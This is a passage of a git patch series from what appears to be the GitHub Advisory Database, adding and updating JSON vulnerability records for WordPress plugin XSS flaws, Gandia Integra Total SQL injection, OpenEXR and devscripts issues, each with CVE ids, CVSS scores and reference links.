"ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6398" + }, + { + "type": "WEB", + "url": "https://www.asus.com/content/security-advisory" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T09:15:33Z" + } +} \ No newline at end of file From 54718af4558c7d7a40d66c51cc2294b549c7a4ec Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 12:34:22 +0000 Subject: [PATCH 291/323] Publish Advisories GHSA-f784-rmxc-rc67 GHSA-r297-m3w3-56rc --- .../GHSA-f784-rmxc-rc67.json | 48 +++++++++++++++++++ .../GHSA-r297-m3w3-56rc.json | 40 ++++++++++++++++ 2 files changed, 88 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-f784-rmxc-rc67/GHSA-f784-rmxc-rc67.json create mode 100644 advisories/unreviewed/2025/08/GHSA-r297-m3w3-56rc/GHSA-r297-m3w3-56rc.json diff --git a/advisories/unreviewed/2025/08/GHSA-f784-rmxc-rc67/GHSA-f784-rmxc-rc67.json b/advisories/unreviewed/2025/08/GHSA-f784-rmxc-rc67/GHSA-f784-rmxc-rc67.json new file mode 100644 index 0000000000000..1d1e51a43eacd --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-f784-rmxc-rc67/GHSA-f784-rmxc-rc67.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f784-rmxc-rc67", + "modified": "2025-08-01T12:32:28Z", + "published": "2025-08-01T12:32:28Z", + "aliases": [ + "CVE-2025-6228" + ], + "details": "The Sina Extension for Elementor (Header Builder, Footer Builter, Theme Builder, Slider, Gallery, Form, Modal, Data Table Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `Sina Posts`, `Sina Blog Post` and `Sina Table` widgets in all versions up to, and including, 3.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6228" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/sina-extension-for-elementor/tags/3.7.0/widgets/advanced/sina-blogpost.php#L2066" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/sina-extension-for-elementor/tags/3.7.0/widgets/basic/sina-table.php#L1659" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/sina-extension-for-elementor/tags/3.7.0/widgets/theme_builder/sina-posts.php#L1879" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fd929710-bdb4-42e1-b409-df41adc22392?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T12:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-r297-m3w3-56rc/GHSA-r297-m3w3-56rc.json b/advisories/unreviewed/2025/08/GHSA-r297-m3w3-56rc/GHSA-r297-m3w3-56rc.json new file mode 100644 index 0000000000000..88e25d7590b0c --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-r297-m3w3-56rc/GHSA-r297-m3w3-56rc.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r297-m3w3-56rc", + "modified": "2025-08-01T12:32:28Z", + "published": "2025-08-01T12:32:28Z", + "aliases": [ + "CVE-2025-4684" + ], + "details": "The BlockSpare: Gutenberg Blocks & Patterns for Blogs, Magazines, Business Sites – Post Grids, Sliders, Carousels, Counters, Page Builder & Starter Site Imports, No Coding Needed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the HTML attributes of Image Carousel and Image Slider widgets in all versions up to, and including, 3.2.13.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4684" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/blockspare/trunk/dist/blocks.js" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f4f8b84-3f65-430b-b749-6afae8d53153?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T12:15:25Z" + } +} \ No newline at end of file From fdf129eea4251dcd68daca3b8b16b89ac7216bbf Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 13:30:51 +0000 Subject: [PATCH 292/323] Publish Advisories GHSA-4r7w-q3jg-ff43 GHSA-h45x-qhg2-q375 GHSA-qhpm-86v7-phmm --- .../GHSA-4r7w-q3jg-ff43/GHSA-4r7w-q3jg-ff43.json | 16 ++++++++++++++-- .../GHSA-h45x-qhg2-q375/GHSA-h45x-qhg2-q375.json | 16 ++++++++++++++-- .../GHSA-qhpm-86v7-phmm/GHSA-qhpm-86v7-phmm.json | 8 ++++++-- 3 files changed, 34 insertions(+), 6 deletions(-) diff --git a/advisories/github-reviewed/2025/07/GHSA-4r7w-q3jg-ff43/GHSA-4r7w-q3jg-ff43.json b/advisories/github-reviewed/2025/07/GHSA-4r7w-q3jg-ff43/GHSA-4r7w-q3jg-ff43.json index 4f093d3c5fd1b..c734aceac707a 100644 --- a/advisories/github-reviewed/2025/07/GHSA-4r7w-q3jg-ff43/GHSA-4r7w-q3jg-ff43.json +++ b/advisories/github-reviewed/2025/07/GHSA-4r7w-q3jg-ff43/GHSA-4r7w-q3jg-ff43.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4r7w-q3jg-ff43", - "modified": "2025-07-31T19:20:05Z", + "modified": "2025-08-01T13:29:02Z", "published": "2025-07-31T19:20:05Z", "aliases": [ "CVE-2025-48072" @@ -43,10 +43,22 @@ "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-4r7w-q3jg-ff43" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48072" + }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/openexr/commit/2d09449427b13a05f7c31a98ab2c4347c23db361" + }, { "type": "PACKAGE", "url": "https://github.com/AcademySoftwareFoundation/openexr" }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.3" + }, { "type": "WEB", "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-48072" @@ -59,6 +71,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-07-31T19:20:05Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-31T21:15:28Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-h45x-qhg2-q375/GHSA-h45x-qhg2-q375.json b/advisories/github-reviewed/2025/07/GHSA-h45x-qhg2-q375/GHSA-h45x-qhg2-q375.json index a4ffd6052cc66..fb7bb25bca73b 100644 --- a/advisories/github-reviewed/2025/07/GHSA-h45x-qhg2-q375/GHSA-h45x-qhg2-q375.json +++ b/advisories/github-reviewed/2025/07/GHSA-h45x-qhg2-q375/GHSA-h45x-qhg2-q375.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h45x-qhg2-q375", - "modified": "2025-07-31T19:12:57Z", + "modified": "2025-08-01T13:28:56Z", "published": "2025-07-31T19:12:56Z", "aliases": [ "CVE-2025-48071" @@ -40,10 +40,22 @@ "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-h45x-qhg2-q375" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48071" + }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/openexr/commit/916cc729e24aa16b86d82813f6e136340ab2876f" + }, { "type": "PACKAGE", "url": "https://github.com/AcademySoftwareFoundation/openexr" }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.3" + }, { "type": "WEB", "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-48071" @@ -56,6 +68,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-07-31T19:12:56Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-31T21:15:27Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-qhpm-86v7-phmm/GHSA-qhpm-86v7-phmm.json b/advisories/github-reviewed/2025/07/GHSA-qhpm-86v7-phmm/GHSA-qhpm-86v7-phmm.json index c922f6be31b73..9fc965dda05b3 100644 --- a/advisories/github-reviewed/2025/07/GHSA-qhpm-86v7-phmm/GHSA-qhpm-86v7-phmm.json +++ b/advisories/github-reviewed/2025/07/GHSA-qhpm-86v7-phmm/GHSA-qhpm-86v7-phmm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qhpm-86v7-phmm", - "modified": "2025-07-31T19:21:35Z", + "modified": "2025-08-01T13:29:06Z", "published": "2025-07-31T19:21:35Z", "aliases": [ "CVE-2025-48073" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-qhpm-86v7-phmm" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48073" + }, { "type": "PACKAGE", "url": "https://github.com/AcademySoftwareFoundation/openexr" @@ -59,6 +63,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-07-31T19:21:35Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-31T21:15:28Z" } } \ No newline at end of file From 66eb36d0e5bdd492fbe8326c06bd2b140bc2a4e3 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 1 Aug 2025 15:36:17 +0000 Subject: [PATCH 293/323] Publish Advisories GHSA-5556-32h3-7q94 GHSA-69cc-7xhp-ffhj GHSA-77fc-r534-vggp GHSA-7g68-w67q-848v GHSA-g37j-43j6-2q28 GHSA-ggwp-w3gm-3cmw GHSA-m523-xm42-q7ff GHSA-mvqq-3c4v-862v GHSA-mw9f-f52p-chpp GHSA-p3vv-cw8r-h94c GHSA-r246-8324-246f GHSA-v6qp-r53v-fvh5 GHSA-xcwr-x5fm-7jmr --- .../GHSA-5556-32h3-7q94.json | 9 ++++- .../GHSA-69cc-7xhp-ffhj.json | 36 +++++++++++++++++ .../GHSA-77fc-r534-vggp.json | 11 +++-- .../GHSA-7g68-w67q-848v.json | 36 +++++++++++++++++ .../GHSA-g37j-43j6-2q28.json | 36 +++++++++++++++++ .../GHSA-ggwp-w3gm-3cmw.json | 36 +++++++++++++++++ .../GHSA-m523-xm42-q7ff.json | 37 +++++++++++++++++ .../GHSA-mvqq-3c4v-862v.json | 36 +++++++++++++++++ .../GHSA-mw9f-f52p-chpp.json | 15 +++++-- .../GHSA-p3vv-cw8r-h94c.json | 36 +++++++++++++++++ .../GHSA-r246-8324-246f.json | 36 +++++++++++++++++ .../GHSA-v6qp-r53v-fvh5.json | 33 +++++++++++++++ .../GHSA-xcwr-x5fm-7jmr.json | 40 +++++++++++++++++++ 13 files changed, 388 insertions(+), 9 deletions(-) create mode 100644 advisories/unreviewed/2025/08/GHSA-69cc-7xhp-ffhj/GHSA-69cc-7xhp-ffhj.json create mode 100644 advisories/unreviewed/2025/08/GHSA-7g68-w67q-848v/GHSA-7g68-w67q-848v.json create mode 100644 advisories/unreviewed/2025/08/GHSA-g37j-43j6-2q28/GHSA-g37j-43j6-2q28.json create mode 100644 advisories/unreviewed/2025/08/GHSA-ggwp-w3gm-3cmw/GHSA-ggwp-w3gm-3cmw.json create mode 100644 advisories/unreviewed/2025/08/GHSA-m523-xm42-q7ff/GHSA-m523-xm42-q7ff.json create mode 100644 advisories/unreviewed/2025/08/GHSA-mvqq-3c4v-862v/GHSA-mvqq-3c4v-862v.json create mode 100644 advisories/unreviewed/2025/08/GHSA-p3vv-cw8r-h94c/GHSA-p3vv-cw8r-h94c.json create mode 100644 advisories/unreviewed/2025/08/GHSA-r246-8324-246f/GHSA-r246-8324-246f.json create mode 100644 advisories/unreviewed/2025/08/GHSA-v6qp-r53v-fvh5/GHSA-v6qp-r53v-fvh5.json create mode 100644 advisories/unreviewed/2025/08/GHSA-xcwr-x5fm-7jmr/GHSA-xcwr-x5fm-7jmr.json diff --git a/advisories/unreviewed/2025/05/GHSA-5556-32h3-7q94/GHSA-5556-32h3-7q94.json b/advisories/unreviewed/2025/05/GHSA-5556-32h3-7q94/GHSA-5556-32h3-7q94.json index 25aac2b40b28a..9145160dcaa7e 100644 --- a/advisories/unreviewed/2025/05/GHSA-5556-32h3-7q94/GHSA-5556-32h3-7q94.json +++ b/advisories/unreviewed/2025/05/GHSA-5556-32h3-7q94/GHSA-5556-32h3-7q94.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5556-32h3-7q94", - "modified": "2025-05-23T15:31:11Z", + "modified": "2025-08-01T15:34:15Z", "published": "2025-05-23T15:31:11Z", "aliases": [ "CVE-2025-41377" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41377" }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-gandia-integra-total-tesi" + }, { "type": "WEB", "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-intellian-technologies-iridium-certus" @@ -26,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-89" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/08/GHSA-69cc-7xhp-ffhj/GHSA-69cc-7xhp-ffhj.json b/advisories/unreviewed/2025/08/GHSA-69cc-7xhp-ffhj/GHSA-69cc-7xhp-ffhj.json new file mode 100644 index 0000000000000..32ecd3f90daf7 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-69cc-7xhp-ffhj/GHSA-69cc-7xhp-ffhj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-69cc-7xhp-ffhj", + "modified": "2025-08-01T15:34:17Z", + "published": "2025-08-01T15:34:17Z", + "aliases": [ + "CVE-2025-41371" + ], + "details": "A SQL injection vulnerability has been found in Gandia Integra Total of TESI from version 2.1.2217.3 to v4.4.2236.1. The vulnerability allows an authenticated attacker to retrieve, create, update and delete databases through the 'idestudio' parameter in /encuestas/integraweb_v4/integra/html/view/acceso.php", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41371" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-gandia-integra-total-tesi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-77fc-r534-vggp/GHSA-77fc-r534-vggp.json b/advisories/unreviewed/2025/08/GHSA-77fc-r534-vggp/GHSA-77fc-r534-vggp.json index a0856b8c41428..9fc86e454bd16 100644 --- a/advisories/unreviewed/2025/08/GHSA-77fc-r534-vggp/GHSA-77fc-r534-vggp.json +++ b/advisories/unreviewed/2025/08/GHSA-77fc-r534-vggp/GHSA-77fc-r534-vggp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-77fc-r534-vggp", - "modified": "2025-08-01T06:31:37Z", + "modified": "2025-08-01T15:34:17Z", "published": "2025-08-01T06:31:37Z", "aliases": [ "CVE-2025-5921" ], "details": "The SureForms WordPress plugin before 1.7.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both authenticated and unauthenticated users.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-08-01T06:15:29Z" diff --git a/advisories/unreviewed/2025/08/GHSA-7g68-w67q-848v/GHSA-7g68-w67q-848v.json b/advisories/unreviewed/2025/08/GHSA-7g68-w67q-848v/GHSA-7g68-w67q-848v.json new file mode 100644 index 0000000000000..04d963c59c4a0 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-7g68-w67q-848v/GHSA-7g68-w67q-848v.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7g68-w67q-848v", + "modified": "2025-08-01T15:34:18Z", + "published": "2025-08-01T15:34:18Z", + "aliases": [ + "CVE-2025-41375" + ], + "details": "A SQL injection vulnerability has been found in Gandia Integra Total of TESI from version 2.1.2217.3 to v4.4.2236.1. The vulnerability allows an authenticated attacker to retrieve, create, update and delete databases through the 'idestudio' parameter in /encuestas/integraweb[_v4]/integra/html/view/consultaincimails.php.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41375" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-gandia-integra-total-tesi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-g37j-43j6-2q28/GHSA-g37j-43j6-2q28.json b/advisories/unreviewed/2025/08/GHSA-g37j-43j6-2q28/GHSA-g37j-43j6-2q28.json new file mode 100644 index 0000000000000..f2a21e759a5d5 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-g37j-43j6-2q28/GHSA-g37j-43j6-2q28.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g37j-43j6-2q28", + "modified": "2025-08-01T15:34:18Z", + "published": "2025-08-01T15:34:18Z", + "aliases": [ + "CVE-2025-41376" + ], + "details": "A SQL injection vulnerability has been found in Gandia Integra Total of TESI from version 2.1.2217.3 to v4.4.2236.1. The vulnerability allows an authenticated attacker to retrieve, create, update and delete databases through the 'idestudio' parameter in /encuestas/integraweb[_v4]/integra/html/view/consultacuotasred.php.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41376" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-gandia-integra-total-tesi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-ggwp-w3gm-3cmw/GHSA-ggwp-w3gm-3cmw.json b/advisories/unreviewed/2025/08/GHSA-ggwp-w3gm-3cmw/GHSA-ggwp-w3gm-3cmw.json new file mode 100644 index 0000000000000..1a25519aa0693 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-ggwp-w3gm-3cmw/GHSA-ggwp-w3gm-3cmw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ggwp-w3gm-3cmw", + "modified": "2025-08-01T15:34:18Z", + "published": "2025-08-01T15:34:17Z", + "aliases": [ + "CVE-2025-41373" + ], + "details": "A SQL injection vulnerability has been found in Gandia Integra Total of TESI from version 2.1.2217.3 to v4.4.2236.1. The vulnerability allows an authenticated attacker to retrieve, create, update and delete databases through the 'idestudio' parameter in /encuestas/integraweb[_v4]/integra/html/view/hislistadoacciones.php.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41373" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-gandia-integra-total-tesi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-m523-xm42-q7ff/GHSA-m523-xm42-q7ff.json b/advisories/unreviewed/2025/08/GHSA-m523-xm42-q7ff/GHSA-m523-xm42-q7ff.json new file mode 100644 index 0000000000000..3c90718f0af03 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-m523-xm42-q7ff/GHSA-m523-xm42-q7ff.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m523-xm42-q7ff", + "modified": "2025-08-01T15:34:18Z", + "published": "2025-08-01T15:34:18Z", + "aliases": [ + "CVE-2025-45767" + ], + "details": "jose v6.0.10 was discovered to contain weak encryption.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45767" + }, + { + "type": "WEB", + "url": "https://gist.github.com/ZupeiNie/705a606fbb99f3bb8c9b51e5bc13c91d" + }, + { + "type": "WEB", + "url": "https://github.com/panva" + }, + { + "type": "WEB", + "url": "https://github.com/panva/jose" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T15:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mvqq-3c4v-862v/GHSA-mvqq-3c4v-862v.json b/advisories/unreviewed/2025/08/GHSA-mvqq-3c4v-862v/GHSA-mvqq-3c4v-862v.json new file mode 100644 index 0000000000000..1f085d698f7cf --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-mvqq-3c4v-862v/GHSA-mvqq-3c4v-862v.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvqq-3c4v-862v", + "modified": "2025-08-01T15:34:17Z", + "published": "2025-08-01T15:34:17Z", + "aliases": [ + "CVE-2025-41370" + ], + "details": "A SQL injection vulnerability has been found in Gandia Integra Total of TESI from version 2.1.2217.3 to v4.4.2236.1. The vulnerability allows an authenticated attacker to retrieve, create, update and delete databases through the 'idestudio' parameter in /encuestas/integraweb/html/view/acceso.php.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41370" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-gandia-integra-total-tesi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mw9f-f52p-chpp/GHSA-mw9f-f52p-chpp.json b/advisories/unreviewed/2025/08/GHSA-mw9f-f52p-chpp/GHSA-mw9f-f52p-chpp.json index 559e6752382db..a1dfe83c77db6 100644 --- a/advisories/unreviewed/2025/08/GHSA-mw9f-f52p-chpp/GHSA-mw9f-f52p-chpp.json +++ b/advisories/unreviewed/2025/08/GHSA-mw9f-f52p-chpp/GHSA-mw9f-f52p-chpp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mw9f-f52p-chpp", - "modified": "2025-08-01T06:31:37Z", + "modified": "2025-08-01T15:34:17Z", "published": "2025-08-01T06:31:37Z", "aliases": [ "CVE-2025-8454" ], "details": "It was discovered that uscan, a tool to scan/watch upstream sources for new releases of software, included in devscripts (a collection of scripts to make the life of a Debian Package maintainer easier), skips OpenPGP verification for files already downloaded even if a previous verification did fail.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-347" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-08-01T06:15:29Z" diff --git a/advisories/unreviewed/2025/08/GHSA-p3vv-cw8r-h94c/GHSA-p3vv-cw8r-h94c.json b/advisories/unreviewed/2025/08/GHSA-p3vv-cw8r-h94c/GHSA-p3vv-cw8r-h94c.json new file mode 100644 index 0000000000000..df962a6604678 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-p3vv-cw8r-h94c/GHSA-p3vv-cw8r-h94c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p3vv-cw8r-h94c", + "modified": "2025-08-01T15:34:18Z", + "published": "2025-08-01T15:34:18Z", + "aliases": [ + "CVE-2025-41374" + ], + "details": "A SQL injection vulnerability has been found in Gandia Integra Total of TESI from version 2.1.2217.3 to v4.4.2236.1. The vulnerability allows an authenticated attacker to retrieve, create, update and delete databases through the 'idestudio' parameter in /encuestas/integraweb[_v4]/integra/html/view/hislistadoacciones.php.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41374" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-gandia-integra-total-tesi" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-r246-8324-246f/GHSA-r246-8324-246f.json b/advisories/unreviewed/2025/08/GHSA-r246-8324-246f/GHSA-r246-8324-246f.json new file mode 100644 index 0000000000000..a8347d6e638ab --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-r246-8324-246f/GHSA-r246-8324-246f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r246-8324-246f", + "modified": "2025-08-01T15:34:17Z", + "published": "2025-08-01T15:34:17Z", + "aliases": [ + "CVE-2025-41372" + 